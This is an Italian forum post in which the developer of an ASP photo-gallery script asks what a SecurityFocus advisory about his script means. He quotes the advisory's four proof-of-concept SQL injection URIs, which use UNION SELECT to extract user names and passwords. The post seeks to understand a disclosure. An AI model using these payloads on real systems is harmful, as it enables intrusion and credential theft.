Salve a tutti, sono capitato su questa pagina che parla dello mio script asp per le gallerie fotografiche.
http://www.securityfocus.com/bid/27262/info
A quanto pare non è giudicato molto sicuro, ma non riesco a capire in che senso...cliccando su exploit dice:
Qualcuno potrebbe spiegarmi cosa vuol dire?An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/Imgbig.asp?Id='union select user as name,1,pass as descrizione from stuff where '1'='1
http://www.example.com/thumbricerca.asp?id=-1'union select user as name,1,pass as descrizione from stuff where 1 like
http://www.example.com/thumbricerca.asp?ricerca=-1'union select user as name,1,pass as descrizione from stuff where 1 lik
http://www.example.com/thumb.asp?id=' union select user as name,1,pass as descrizione from stuff where '1'='1
Rispondi quotando